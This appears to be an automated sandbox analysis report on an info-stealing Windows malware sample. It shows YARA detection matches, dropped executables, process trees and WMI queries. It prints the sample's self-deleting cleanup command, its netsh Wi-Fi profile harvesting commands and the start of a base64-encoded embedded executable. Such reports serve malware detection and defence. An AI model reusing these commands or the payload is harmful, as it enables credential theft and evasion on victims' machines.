Source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: String function: 00B78C20 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: String function: 00B92F70 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: String function: 0040E1D8 appears 44 times

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Binary or memory string: OriginalFilename vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301495606.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301246051.0000000000E1B000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Source: chormuim.exe.6.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: chormuimii.exe.0.dr

Static PE information: Section: .rsrc ZLIB complexity 0.998019503879

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/48@7/5

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe

Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

6_2_004019F0

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Virustotal: Detection: 70%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Metadefender: Detection: 31%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	ReversingLabs: Detection: 74%

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe "C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: unknown	Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4648)

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

File created: C:\Users\user\AppData\Local\Temp\svchoste.exe

Jump to behavior

Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\ProgramData\AMD Driver\taskshell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe

6_2_004019F0

Source: dll.exe.0.dr, Forms.cs	Base64 encoded string: 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEd8AckAAAAAAAAAAOAAAgELATAAACAAAAAIAAAAAAAAbj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ/AABXAAAAAEAAAPAEAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPAEAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABQPwAAAAAAAEgAAAACAAUASCYAAMwYAAADAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooAgAABipaAn4CAAAEbxQAAApvFQAACiwCFyoWKqooDwAABn4OAAAEJS0XJn4NAAAE/gYjAAAGcxkAAAYlgA4AAAQoDQAABioyFIADAAAEKBAAAAYq5n4EAAAELAEqfgsAAAQlLRcmfgoAAAT+Bh8AAAZzGQAACiWACwAABHM